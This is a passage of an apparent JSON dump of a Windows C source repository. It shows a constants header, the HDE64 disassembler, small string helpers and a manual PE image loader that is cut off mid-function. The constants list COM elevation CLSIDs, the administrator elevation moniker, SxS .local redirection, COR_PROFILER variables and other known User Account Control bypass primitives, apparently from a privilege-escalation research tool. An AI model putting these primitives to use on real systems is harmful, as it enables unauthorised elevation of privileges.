MMCEX_DIR                   L\"\\\\MMCEx\"\n#define WBEM_DIR                    L\"wbem\\\\\"\n#define WEBVIEW_DIR                 L\"EBWebView\"\n\n//\n// Shell Verbs\n//\n#define RUNAS_VERB                  L\"runas\"\n\n//\n// Windows MMC snap-ins\n//\n#define EVENTVWR_MSC                L\"eventvwr.msc\"\n#define WMIMGMT_MSC                 L\"WmiMgmt.msc\"\n\n//\n// Units specific values\n//\n#define MYSTERIOUSCUTETHING         L\"pe386\" //PYSH\n#define ABSOLUTEWIN                 L\"lzx32\" //PYSH\n#define THEOLDNEWTHING              L\"hui32\" //PYSH\n\n//\n// SxS\n//\n#define LOCAL_SXS                   L\".local\"  //PYSH\n#define FAKE_LOCAL_SXS              L\".@\" //PYSH\n#define COMCTL32_SXS                L\"microsoft.windows.common-controls\"\n#define GDIPLUS_SXS                 L\"microsoft.windows.gdiplus\"\n\n//\n// System consts\n//\n#define T_VOLATILE_ENV              L\"Volatile Environment\"\n#define T_REGISTRY_PREP             L\"\\\\REGISTRY\\\\\" //end slash included\n\n//\n// COR profiler\n//\n#define COR_PROFILER                L\"COR_PROFILER\"\n#define COR_PROFILER_PATH           L\"COR_PROFILER_PATH\"\n#define COR_ENABLE_PROFILING        L\"COR_ENABLE_PROFILING\"\n\n//\n// WebView environment variable\n//\n#define WEBVIEW2_FOLRDER_VAR        L\"WEBVIEW2_BROWSER_EXECUTABLE_FOLDER\"\n\n//\n// DCCW calibrator\n//\n#define T_CALIBRATOR_VALUE          L\"DisplayCalibrator\" //PYSH\n\n//\n// COM related trash\n//\n#define T_REG_SOFTWARECLASSESCLSID  L\"Software\\\\Classes\\\\CLSID\\\\\"\n#define T_REG_INPROCSERVER32        L\"\\\\InProcServer32\"\n#define T_REG_SHELLFOLDER           L\"\\\\ShellFolder\"\n\n#define T_THREADINGMODEL            L\"ThreadingModel\"\n#define T_APARTMENT                 L\"Apartment\"\n\n//\n// COM objects elevation\n//\n#pragma region PYSH\n#define T_CLSID_ColorDataProxy               L\"{D2E7041B-2927-42fb-8E9F-7CE93B6DC937}\"\n#define T_CLSID_CMSTPLUA                     
L\"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\"\n#define T_CLSID_FwCplLua                     L\"{752438CB-E941-433F-BCB4-8B7D2329F0C8}\"\n#define T_CLSID_FileOperation                L\"{3AD05575-8857-4850-9277-11B85BDB8E09}\"\n#define T_CLSID_ShellSecurityEditor          L\"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}\"\n#define T_CLSID_EditionUpgradeManager        L\"{17CCA47D-DAE5-4E4A-AC42-CC54E28F334A}\"\n#define T_CLSID_IEAAddonInstaller            L\"{BDB57FF2-79B9-4205-9447-F5FE85F37312}\"\n#define T_CLSID_SecurityCenter               L\"{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}\"\n#define T_CLSID_VFServer                     L\"{A6BFEA43-501F-456F-A845-983D3AD7B8F0}\"\n#define T_CLSID_VFServerDiagCpl              L\"{12C21EA7-2EB8-4B55-9249-AC243DA8C666}\"\n#define T_CLSID_DiagnosticProfile            L\"{D0B7E02C-E1A3-11DC-81FF-001185AE5E76}\"\n#pragma endregion\n\n//\n// Moniker(s)\n//\n#define T_ELEVATION_MONIKER_ADMIN            L\"Elevation:Administrator!new:\"\n\n\n//\n// RPC interface UUID\n//\n#define APPINFO_RPC                         TEXT(\"201ef99a-7fa0-444c-9399-19ba84f12a1a\")\n#define PCASVC_RPC                          TEXT(\"0767a036-0d22-48aa-ba69-b619480f38cb\")\n"
  },
  {
    "path": "Source/Shared/hde/hde64.c",
    "content": "﻿/*\n * Hacker Disassembler Engine 64 C\n * Copyright (c) 2008-2009, Vyacheslav Patkov.\n * All rights reserved.\n *\n */\n\n#include \"hde64.h\"\n#include \"table64.h\"\n\n#pragma warning(push)\n#pragma warning(disable:4701)\n#pragma warning(disable:4706)\n\nunsigned int hde64_disasm(const void *code, hde64s *hs)\n{\n    uint8_t x, c = 0, *p = (uint8_t *)code, cflags, opcode, pref = 0;\n    uint8_t *ht = hde64_table, m_mod, m_reg, m_rm, disp_size = 0;\n    uint8_t op64 = 0;\n\n    // Avoid using memset to reduce the footprint.\n#ifndef _MSC_VER\n    memset((LPBYTE)hs, 0, sizeof(hde64s));\n#else\n    __stosb((LPBYTE)hs, 0, sizeof(hde64s));\n#endif\n\n    for (x = 16; x; x--)\n        switch (c = *p++) {\n            case 0xf3:\n                hs->p_rep = c;\n                pref |= PRE_F3;\n                break;\n            case 0xf2:\n                hs->p_rep = c;\n                pref |= PRE_F2;\n                break;\n            case 0xf0:\n                hs->p_lock = c;\n                pref |= PRE_LOCK;\n                break;\n            case 0x26: case 0x2e: case 0x36:\n            case 0x3e: case 0x64: case 0x65:\n                hs->p_seg = c;\n                pref |= PRE_SEG;\n                break;\n            case 0x66:\n                hs->p_66 = c;\n                pref |= PRE_66;\n                break;\n            case 0x67:\n                hs->p_67 = c;\n                pref |= PRE_67;\n                break;\n            default:\n                goto pref_done;\n        }\n  pref_done:\n\n    hs->flags = (uint32_t)pref << 23;\n\n    if (!pref)\n        pref |= PRE_NONE;\n\n    if ((c & 0xf0) == 0x40) {\n        hs->flags |= F_PREFIX_REX;\n        if ((hs->rex_w = (c & 0xf) >> 3) && (*p & 0xf8) == 0xb8)\n            op64++;\n        hs->rex_r = (c & 7) >> 2;\n        hs->rex_x = (c & 3) >> 1;\n        hs->rex_b = c & 1;\n        if (((c = *p++) & 0xf0) == 0x40) {\n            opcode = c;\n            goto error_opcode;\n 
       }\n    }\n\n    if ((hs->opcode = c) == 0x0f) {\n        hs->opcode2 = c = *p++;\n        ht += DELTA_OPCODES;\n    } else if (c >= 0xa0 && c <= 0xa3) {\n        op64++;\n        if (pref & PRE_67)\n            pref |= PRE_66;\n        else\n            pref &= ~PRE_66;\n    }\n\n    opcode = c;\n    cflags = ht[ht[opcode / 4] + (opcode % 4)];\n\n    if (cflags == C_ERROR) {\n      error_opcode:\n        hs->flags |= F_ERROR | F_ERROR_OPCODE;\n        cflags = 0;\n        if ((opcode & -3) == 0x24)\n            cflags++;\n    }\n\n    x = 0;\n    if (cflags & C_GROUP) {\n        uint16_t t;\n        t = *(uint16_t *)(ht + (cflags & 0x7f));\n        cflags = (uint8_t)t;\n        x = (uint8_t)(t >> 8);\n    }\n\n    if (hs->opcode2) {\n        ht = hde64_table + DELTA_PREFIXES;\n        if (ht[ht[opcode / 4] + (opcode % 4)] & pref)\n            hs->flags |= F_ERROR | F_ERROR_OPCODE;\n    }\n\n    if (cflags & C_MODRM) {\n        hs->flags |= F_MODRM;\n        hs->modrm = c = *p++;\n        hs->modrm_mod = m_mod = c >> 6;\n        hs->modrm_rm = m_rm = c & 7;\n        hs->modrm_reg = m_reg = (c & 0x3f) >> 3;\n\n        if (x && ((x << m_reg) & 0x80))\n            hs->flags |= F_ERROR | F_ERROR_OPCODE;\n\n        if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) {\n            uint8_t t = opcode - 0xd9;\n            if (m_mod == 3) {\n                ht = hde64_table + DELTA_FPU_MODRM + t*8;\n                t = ht[m_reg] << m_rm;\n            } else {\n                ht = hde64_table + DELTA_FPU_REG;\n                t = ht[t] << m_reg;\n            }\n            if (t & 0x80)\n                hs->flags |= F_ERROR | F_ERROR_OPCODE;\n        }\n\n        if (pref & PRE_LOCK) {\n            if (m_mod == 3) {\n                hs->flags |= F_ERROR | F_ERROR_LOCK;\n            } else {\n                uint8_t *table_end, op = opcode;\n                if (hs->opcode2) {\n                    ht = hde64_table + DELTA_OP2_LOCK_OK;\n                    table_end = 
ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK; //-V594\n                } else {\n                    ht = hde64_table + DELTA_OP_LOCK_OK;\n                    table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK; //-V594\n                    op &= -2;\n                }\n                for (; ht != table_end; ht++)\n                    if (*ht++ == op) {\n                        if (!((*ht << m_reg) & 0x80))\n                            goto no_lock_error;\n                        else\n                            break;\n                    }\n                hs->flags |= F_ERROR | F_ERROR_LOCK;\n              no_lock_error:\n                ;\n            }\n        }\n\n        if (hs->opcode2) {\n            switch (opcode) {\n                case 0x20: case 0x22:\n                    m_mod = 3;\n                    if (m_reg > 4 || m_reg == 1)\n                        goto error_operand;\n                    else\n                        goto no_error_operand;\n                case 0x21: case 0x23:\n                    m_mod = 3;\n                    if (m_reg == 4 || m_reg == 5)\n                        goto error_operand;\n                    else\n                        goto no_error_operand;\n            }\n        } else {\n            switch (opcode) {\n                case 0x8c:\n                    if (m_reg > 5)\n                        goto error_operand;\n                    else\n                        goto no_error_operand;\n                case 0x8e:\n                    if (m_reg == 1 || m_reg > 5)\n                        goto error_operand;\n                    else\n                        goto no_error_operand;\n            }\n        }\n\n        if (m_mod == 3) {\n            uint8_t *table_end;\n            if (hs->opcode2) {\n                ht = hde64_table + DELTA_OP2_ONLY_MEM;\n                table_end = ht + sizeof(hde64_table) - DELTA_OP2_ONLY_MEM; //-V594\n            } else {\n                ht = hde64_table + 
DELTA_OP_ONLY_MEM;\n                table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM; //-V594\n            }\n            for (; ht != table_end; ht += 2)\n                if (*ht++ == opcode) {\n                    if (*ht++ & pref && !((*ht << m_reg) & 0x80))\n                        goto error_operand;\n                    else\n                        break;\n                }\n            goto no_error_operand;\n        } else if (hs->opcode2) {\n            switch (opcode) {\n                case 0x50: case 0xd7: case 0xf7:\n                    if (pref & (PRE_NONE | PRE_66))\n                        goto error_operand;\n                    break;\n                case 0xd6:\n                    if (pref & (PRE_F2 | PRE_F3))\n                        goto error_operand;\n                    break;\n                case 0xc5:\n                    goto error_operand;\n            }\n            goto no_error_operand;\n        } else\n            goto no_error_operand;\n\n      error_operand:\n        hs->flags |= F_ERROR | F_ERROR_OPERAND;\n      no_error_operand:\n\n        c = *p++;\n        if (m_reg <= 1) {\n            if (opcode == 0xf6)\n                cflags |= C_IMM8;\n            else if (opcode == 0xf7)\n                cflags |= C_IMM_P66;\n        }\n\n        switch (m_mod) {\n            case 0:\n                if (pref & PRE_67) {\n                    if (m_rm == 6)\n                        disp_size = 2;\n                } else\n                    if (m_rm == 5)\n                        disp_size = 4;\n                break;\n            case 1:\n                disp_size = 1;\n                break;\n            case 2:\n                disp_size = 2;\n                if (!(pref & PRE_67))\n                    disp_size <<= 1;\n        }\n\n        if (m_mod != 3 && m_rm == 4) {\n            hs->flags |= F_SIB;\n            p++;\n            hs->sib = c;\n            hs->sib_scale = c >> 6;\n            hs->sib_index = (c & 0x3f) >> 
3;\n            if ((hs->sib_base = c & 7) == 5 && !(m_mod & 1))\n                disp_size = 4;\n        }\n\n        p--;\n        switch (disp_size) {\n            case 1:\n                hs->flags |= F_DISP8;\n                hs->disp.disp8 = *p;\n                break;\n            case 2:\n                hs->flags |= F_DISP16;\n                hs->disp.disp16 = *(uint16_t *)p;\n                break;\n            case 4:\n                hs->flags |= F_DISP32;\n                hs->disp.disp32 = *(uint32_t *)p;\n        }\n        p += disp_size;\n    } else if (pref & PRE_LOCK)\n        hs->flags |= F_ERROR | F_ERROR_LOCK;\n\n    if (cflags & C_IMM_P66) {\n        if (cflags & C_REL32) {\n            if (pref & PRE_66) {\n                hs->flags |= F_IMM16 | F_RELATIVE;\n                hs->imm.imm16 = *(uint16_t *)p;\n                p += 2;\n                goto disasm_done;\n            }\n            goto rel32_ok;\n        }\n        if (op64) {\n            hs->flags |= F_IMM64;\n            hs->imm.imm64 = *(uint64_t *)p;\n            p += 8;\n        } else if (!(pref & PRE_66)) {\n            hs->flags |= F_IMM32;\n            hs->imm.imm32 = *(uint32_t *)p;\n            p += 4;\n        } else\n            goto imm16_ok;\n    }\n\n\n    if (cflags & C_IMM16) {\n      imm16_ok:\n        hs->flags |= F_IMM16;\n        hs->imm.imm16 = *(uint16_t *)p;\n        p += 2;\n    }\n    if (cflags & C_IMM8) {\n        hs->flags |= F_IMM8;\n        hs->imm.imm8 = *p++;\n    }\n\n    if (cflags & C_REL32) {\n      rel32_ok:\n        hs->flags |= F_IMM32 | F_RELATIVE;\n        hs->imm.imm32 = *(uint32_t *)p;\n        p += 4;\n    } else if (cflags & C_REL8) {\n        hs->flags |= F_IMM8 | F_RELATIVE;\n        hs->imm.imm8 = *p++;\n    }\n\n  disasm_done:\n\n    if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) {\n        hs->flags |= F_ERROR | F_ERROR_LENGTH;\n        hs->len = 15;\n    }\n\n    return (unsigned int)hs->len;\n}\n#pragma warning(pop)\n"
  },
  {
    "path": "Source/Shared/hde/hde64.h",
    "content": "﻿/*\n * Hacker Disassembler Engine 64\n * Copyright (c) 2008-2009, Vyacheslav Patkov.\n * All rights reserved.\n *\n * hde64.h: C/C++ header file\n *\n */\n\n#ifndef _HDE64_H_\n#define _HDE64_H_\n\n/* stdint.h - C99 standard header\n * http://en.wikipedia.org/wiki/stdint.h\n *\n * if your compiler doesn't contain \"stdint.h\" header (for\n * example, Microsoft Visual C++), you can download file:\n *   http://www.azillionmonkeys.com/qed/pstdint.h\n * and change next line to:\n *   #include \"pstdint.h\"\n */\n#include \"pstdint.h\"\n\n#define F_MODRM         0x00000001\n#define F_SIB           0x00000002\n#define F_IMM8          0x00000004\n#define F_IMM16         0x00000008\n#define F_IMM32         0x00000010\n#define F_IMM64         0x00000020\n#define F_DISP8         0x00000040\n#define F_DISP16        0x00000080\n#define F_DISP32        0x00000100\n#define F_RELATIVE      0x00000200\n#define F_ERROR         0x00001000\n#define F_ERROR_OPCODE  0x00002000\n#define F_ERROR_LENGTH  0x00004000\n#define F_ERROR_LOCK    0x00008000\n#define F_ERROR_OPERAND 0x00010000\n#define F_PREFIX_REPNZ  0x01000000\n#define F_PREFIX_REPX   0x02000000\n#define F_PREFIX_REP    0x03000000\n#define F_PREFIX_66     0x04000000\n#define F_PREFIX_67     0x08000000\n#define F_PREFIX_LOCK   0x10000000\n#define F_PREFIX_SEG    0x20000000\n#define F_PREFIX_REX    0x40000000\n#define F_PREFIX_ANY    0x7f000000\n\n#define PREFIX_SEGMENT_CS   0x2e\n#define PREFIX_SEGMENT_SS   0x36\n#define PREFIX_SEGMENT_DS   0x3e\n#define PREFIX_SEGMENT_ES   0x26\n#define PREFIX_SEGMENT_FS   0x64\n#define PREFIX_SEGMENT_GS   0x65\n#define PREFIX_LOCK         0xf0\n#define PREFIX_REPNZ        0xf2\n#define PREFIX_REPX         0xf3\n#define PREFIX_OPERAND_SIZE 0x66\n#define PREFIX_ADDRESS_SIZE 0x67\n\n#pragma pack(push,1)\n\ntypedef struct {\n    uint8_t len;\n    uint8_t p_rep;\n    uint8_t p_lock;\n    uint8_t p_seg;\n    uint8_t p_66;\n    uint8_t p_67;\n    uint8_t rex;\n    uint8_t rex_w;\n    
uint8_t rex_r;\n    uint8_t rex_x;\n    uint8_t rex_b;\n    uint8_t opcode;\n    uint8_t opcode2;\n    uint8_t modrm;\n    uint8_t modrm_mod;\n    uint8_t modrm_reg;\n    uint8_t modrm_rm;\n    uint8_t sib;\n    uint8_t sib_scale;\n    uint8_t sib_index;\n    uint8_t sib_base;\n    union {\n        uint8_t imm8;\n        uint16_t imm16;\n        uint32_t imm32;\n        uint64_t imm64;\n    } imm;\n    union {\n        uint8_t disp8;\n        uint16_t disp16;\n        uint32_t disp32;\n    } disp;\n    uint32_t flags;\n} hde64s;\n\n#pragma pack(pop)\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n/* __cdecl */\nunsigned int hde64_disasm(const void *code, hde64s *hs);\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* _HDE64_H_ */\n"
  },
  {
    "path": "Source/Shared/hde/pstdint.h",
    "content": "﻿/*\n *  MinHook - The Minimalistic API Hooking Library for x64/x86\n *  Copyright (C) 2009-2015 Tsuda Kageyu. All rights reserved.\n *\n *  Redistribution and use in source and binary forms, with or without\n *  modification, are permitted provided that the following conditions\n *  are met:\n *\n *  1. Redistributions of source code must retain the above copyright\n *     notice, this list of conditions and the following disclaimer.\n *  2. Redistributions in binary form must reproduce the above copyright\n *     notice, this list of conditions and the following disclaimer in the\n *     documentation and/or other materials provided with the distribution.\n *\n *  THIS SOFTWARE IS PROVIDED BY THE AUTHOR \"AS IS\" AND ANY EXPRESS OR\n *  IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\n *  OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.\n *  IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,\n *  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT\n *  NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n *  DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n *  THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n *  (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF\n *  THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n */\n\n#pragma once\n\n#include <windows.h>\n\n// Integer types for HDE.\ntypedef INT8   int8_t;\ntypedef INT16  int16_t;\ntypedef INT32  int32_t;\ntypedef INT64  int64_t;\ntypedef UINT8  uint8_t;\ntypedef UINT16 uint16_t;\ntypedef UINT32 uint32_t;\ntypedef UINT64 uint64_t;\n"
  },
  {
    "path": "Source/Shared/hde/table64.h",
    "content": "﻿/*\n * Hacker Disassembler Engine 64 C\n * Copyright (c) 2008-2009, Vyacheslav Patkov.\n * All rights reserved.\n *\n */\n\n#define C_NONE    0x00\n#define C_MODRM   0x01\n#define C_IMM8    0x02\n#define C_IMM16   0x04\n#define C_IMM_P66 0x10\n#define C_REL8    0x20\n#define C_REL32   0x40\n#define C_GROUP   0x80\n#define C_ERROR   0xff\n\n#define PRE_ANY  0x00\n#define PRE_NONE 0x01\n#define PRE_F2   0x02\n#define PRE_F3   0x04\n#define PRE_66   0x08\n#define PRE_67   0x10\n#define PRE_LOCK 0x20\n#define PRE_SEG  0x40\n#define PRE_ALL  0xff\n\n#define DELTA_OPCODES      0x4a\n#define DELTA_FPU_REG      0xfd\n#define DELTA_FPU_MODRM    0x104\n#define DELTA_PREFIXES     0x13c\n#define DELTA_OP_LOCK_OK   0x1ae\n#define DELTA_OP2_LOCK_OK  0x1c6\n#define DELTA_OP_ONLY_MEM  0x1d8\n#define DELTA_OP2_ONLY_MEM 0x1e7\n\nunsigned char hde64_table[] = {\n  0xa5,0xaa,0xa5,0xb8,0xa5,0xaa,0xa5,0xaa,0xa5,0xb8,0xa5,0xb8,0xa5,0xb8,0xa5,\n  0xb8,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xac,0xc0,0xcc,0xc0,0xa1,0xa1,\n  0xa1,0xa1,0xb1,0xa5,0xa5,0xa6,0xc0,0xc0,0xd7,0xda,0xe0,0xc0,0xe4,0xc0,0xea,\n  0xea,0xe0,0xe0,0x98,0xc8,0xee,0xf1,0xa5,0xd3,0xa5,0xa5,0xa1,0xea,0x9e,0xc0,\n  0xc0,0xc2,0xc0,0xe6,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0xab,\n  0x8b,0x90,0x64,0x5b,0x5b,0x5b,0x5b,0x5b,0x92,0x5b,0x5b,0x76,0x90,0x92,0x92,\n  0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x6a,0x73,0x90,\n  0x5b,0x52,0x52,0x52,0x52,0x5b,0x5b,0x5b,0x5b,0x77,0x7c,0x77,0x85,0x5b,0x5b,\n  0x70,0x5b,0x7a,0xaf,0x76,0x76,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,\n  0x5b,0x5b,0x86,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xd5,0x03,0xcc,0x01,0xbc,\n  0x03,0xf0,0x03,0x03,0x04,0x00,0x50,0x50,0x50,0x50,0xff,0x20,0x20,0x20,0x20,\n  0x01,0x01,0x01,0x01,0xc4,0x02,0x10,0xff,0xff,0xff,0x01,0x00,0x03,0x11,0xff,\n  0x03,0xc4,0xc6,0xc8,0x02,0x10,0x00,0xff,0xcc,0x01,0x01,0x01,0x00,0x00,0x00,\n  0x00,0x01,0x01,0x03,0x01,0xff,0xff,0xc0,0xc2,0x10,0x11,0x02,0x03,0x01,0x01,\n  
0x01,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0x00,0x00,0xff,0xff,0xff,0xff,0x10,\n  0x10,0x10,0x10,0x02,0x10,0x00,0x00,0xc6,0xc8,0x02,0x02,0x02,0x02,0x06,0x00,\n  0x04,0x00,0x02,0xff,0x00,0xc0,0xc2,0x01,0x01,0x03,0x03,0x03,0xca,0x40,0x00,\n  0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00,0x00,0x00,0x00,\n  0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0xff,0x00,\n  0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,\n  0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00,\n  0xff,0x40,0x40,0x40,0x40,0x41,0x49,0x40,0x40,0x40,0x40,0x4c,0x42,0x40,0x40,\n  0x40,0x40,0x40,0x40,0x40,0x40,0x4f,0x44,0x53,0x40,0x40,0x40,0x44,0x57,0x43,\n  0x5c,0x40,0x60,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,\n  0x40,0x40,0x64,0x66,0x6e,0x6b,0x40,0x40,0x6a,0x46,0x40,0x40,0x44,0x46,0x40,\n  0x40,0x5b,0x44,0x40,0x40,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x06,0x01,0x06,\n  0x06,0x02,0x06,0x06,0x00,0x06,0x00,0x0a,0x0a,0x00,0x00,0x00,0x02,0x07,0x07,\n  0x06,0x02,0x0d,0x06,0x06,0x06,0x0e,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04,\n  0x04,0x04,0x05,0x06,0x06,0x06,0x00,0x00,0x00,0x0e,0x00,0x00,0x08,0x00,0x10,\n  0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01,0x86,0x00,\n  0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba,0xf8,0xbb,\n  0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00,0xc4,0xff,\n  0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00,0x13,0x09,\n  0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07,0xb2,0xff,\n  0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf,0xe7,0x08,\n  0x00,0xf0,0x02,0x00\n};\n"
  },
  {
    "path": "Source/Shared/itostr.c",
    "content": "#include \"rtltypes.h\"\n\nsize_t itostr_a(int x, char *s)\n{\n\tint\t\tt;\n\tsize_t\ti, r = 1, sign;\n\n\tt = x;\n\n\tif (x < 0) {\n\t\tsign = 1;\n\t\twhile (t <= -10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\telse {\n\t\tsign = 0;\n\t\twhile (t >= 10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\n\tif (s == 0)\n\t\treturn r + sign;\n\n\tif (sign) {\n\t\t*s = '-';\n\t\ts++;\n\t}\n\n\tfor (i = r; i != 0; i--) {\n\t\ts[i - 1] = (char)byteabs(x % 10) + '0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (char)0;\n\treturn r + sign;\n}\n\n\nsize_t itostr_w(int x, wchar_t *s)\n{\n\tint\t\tt;\n\tsize_t\ti, r = 1, sign;\n\n\tt = x;\n\n\tif (x < 0) {\n\t\tsign = 1;\n\t\twhile (t <= -10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\telse {\n\t\tsign = 0;\n\t\twhile (t >= 10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\n\tif (s == 0)\n\t\treturn r + sign;\n\n\tif (sign) {\n\t\t*s = '-';\n\t\ts++;\n\t}\n\n\tfor (i = r; i != 0; i--) {\n\t\ts[i - 1] = (wchar_t)byteabs(x % 10) + L'0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (wchar_t)0;\n\treturn r + sign;\n}\n"
  },
  {
    "path": "Source/Shared/ldr.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2015 - 2025\n*\n*  TITLE:       LDR.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 Jul 2025\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\nDWORD align_gt(\n    DWORD p,\n    DWORD align\n)\n{\n    DWORD remainder;\n\n    if (align == 0) return p;\n    remainder = p % align;\n    if (remainder == 0) return p;\n\n    if (p > MAXDWORD - (align - remainder)) return p;\n    return p + (align - remainder);\n}\n\nDWORD align_le(\n    DWORD p,\n    DWORD align\n)\n{\n    if ((p % align) == 0)\n        return p;\n\n    return p - (p % align);\n}\n\nLPVOID PELoaderLoadImage(\n    _In_ LPVOID Buffer,\n    _Out_opt_ PDWORD SizeOfImage\n)\n{\n    DWORD c, p, rsz;\n    DWORD optHeaderSize = 0, headersSize = 0;\n    DWORD_PTR delta;\n    LPWORD chains;\n    LPVOID exeBuffer = NULL;\n    PIMAGE_DOS_HEADER dosh;\n    PIMAGE_FILE_HEADER fileh;\n    PIMAGE_OPTIONAL_HEADER popth;\n    PIMAGE_SECTION_HEADER sections;\n    PIMAGE_BASE_RELOCATION rel;\n    PIMAGE_NT_HEADERS nth = NULL;\n\n    do {\n        if (Buffer == NULL) {\n            SetLastError(ERROR_INVALID_PARAMETER);\n            break;\n        }\n\n        // check image headers\n        // we are supposed to deal with valid or system bins usually so these checks are slightly redurant\n\n        dosh = (PIMAGE_DOS_HEADER)Buffer;\n        if (dosh->e_magic != IMAGE_DOS_SIGNATURE) {\n            SetLastError(ERROR_BAD_EXE_FORMAT);\n            break;\n        }\n\n        if (dosh->e_lfanew < sizeof(IMAGE_DOS_HEADER) || dosh->e_lfanew > 0xFFFFF) {\n            SetLastError(ERROR_INVALID_EXE_SIGNATURE);\n 
           break;\n        }\n\n        nth = (PIMAGE_NT_HEADERS)((PBYTE)Buffer + dosh->e_lfanew);\n        if (nth->Signature != IMAGE_NT_SIGNATURE) {\n            SetLastError(ERROR_INVALID_EXE_SIGNATURE);\n            break;\n        }\n\n        fileh = (PIMAGE_FILE_HEADER)((PBYTE)dosh + sizeof(DWORD) + dosh->e_lfanew);\n        optHeaderSize = fileh->SizeOfOptionalHeader;\n        if (optHeaderSize != sizeof(IMAGE_OPTIONAL_HEADER32) &&\n            optHeaderSize != sizeof(IMAGE_OPTIONAL_HEADER64)) {\n            SetLastError(ERROR_BAD_EXE_FORMAT);\n            break;\n        }\n\n        popth = (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));\n        if (popth->Magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC &&\n            popth->Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC) {\n            SetLastError(ERROR_EXE_MARKED_INVALID);\n            break;\n        }\n\n        if (SizeOfImage) *SizeOfImage = popth->SizeOfImage;\n\n        // render image\n        headersSize = align_gt(popth->SizeOfHeaders, popth->FileAlignment);\n        if (headersSize > popth->SizeOfImage) {\n            SetLastError(ERROR_BAD_EXE_FORMAT);\n            break;\n        }\n\n        exeBuffer = VirtualAlloc(NULL, popth->SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\n        if (exeBuffer == NULL) {\n            SetLastError(ERROR_NOT_ENOUGH_MEMORY);\n            break;\n        }\n\n        memcpy(exeBuffer, Buffer, min(headersSize, popth->SizeOfHeaders));\n\n        sections = (PIMAGE_SECTION_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER) + fileh->SizeOfOptionalHeader);\n        for (c = 0; c < fileh->NumberOfSections; c++) {\n            if ((sections[c].SizeOfRawData > 0) && (sections[c].PointerToRawData > 0)) {\n                memcpy((PBYTE)exeBuffer + sections[c].VirtualAddress,\n                    (PBYTE)Buffer + align_le(sections[c].PointerToRawData, popth->FileAlignment),\n                    align_gt(sections[c].SizeOfRawData, popth->FileAlignment));\n 
